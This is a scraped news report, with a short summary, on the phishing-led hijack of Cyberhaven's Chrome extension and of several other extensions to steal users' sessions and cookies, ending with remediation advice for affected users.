Article Details
Scrape Timestamp (UTC): 2024-12-27 15:44:00.955
Original Article Text
Click to Toggle View
Cybersecurity firm's Chrome extension hijacked to steal users' data. At least five Chrome extensions were compromised in a coordinated attack where a threat actor injected code that steals sensitive information from users. One attack was disclosed by Cyberhaven, a data loss prevention company that alerted its customers of a breach on December 24 after a successful phishing attack on an administrator account for the Google Chrome store. Among Cyberhaven's customers are Snowflake, Motorola, Canon, Reddit, AmeriHealth, Cooley, IVP, Navan, DBS, Upstart, and Kirkland & Ellis. The hacker hijacked the employee’s account and published a malicious version (24.10.4) of the Cyberhaven extension, which included code that could exfiltrate authenticated sessions and cookies to the attacker's domain (cyberhavenext[.]pro). Cyberhaven's internal security team removed the malicious package within an hour since its detection, the company says in an email to its customers. A clean version of the extension, v24.10.5 was published on December 26. Apart from upgrading to the latest version, users of the Cyberhaven Chrome extension are recommended to revoke passwords that aren’t FIDOv2, rotate all API tokens, and review browser logs to evaluate malicious activity. More Chrome extensions breached Following Cyberhaven's disclosure, Nudge Security researcher Jaime Blasco took the investigation further, pivoting from the attacker’s IP addresses and registered domains. According to Blasco, the malicious code snippet that let the extension receive commands from the attacker was also injected around the same time in other Chrome extensions: Blasco found more domains that point to other potential victims but only the extensions above were confirmed to carry the malicious code snippet. Users of these extensions are recommended to either remove them from the browser or upgrade to a safe version published after December 26 after making sure that the publisher has learned about the security issue and fixed it. If unsure, it would be better to uninstall the extension, reset important account passwords, clear browser data, and reset browser settings to their original defaults.
Daily Brief Summary
Cybersecurity firm Cyberhaven announced a breach involving their Chrome extension after an administrator's account was phished.
The compromised extension version 24.10.4 contained code that enabled data theft from users by exfiltrating authenticated sessions and cookies.
The malicious package was detected and removed within an hour of its installation, and a safe version (24.10.5) was released shortly after.
The attack affected other Chrome extensions as well, with similar malicious code snippets found by Nudge Security researcher Jaime Blasco.
Affected users are advised to upgrade to the latest versions of their extensions, revoke non-FIDOv2 passwords, rotate API tokens, and review browser logs for signs of malicious activity.
Additional recommended actions for users include uninstalling questionable extensions, resetting important passwords, clearing browser data, and restoring default browser settings.
High-profile Cyberhaven clients such as Snowflake, Motorola, Canon, and Reddit among others, potentially impacted by this security breach.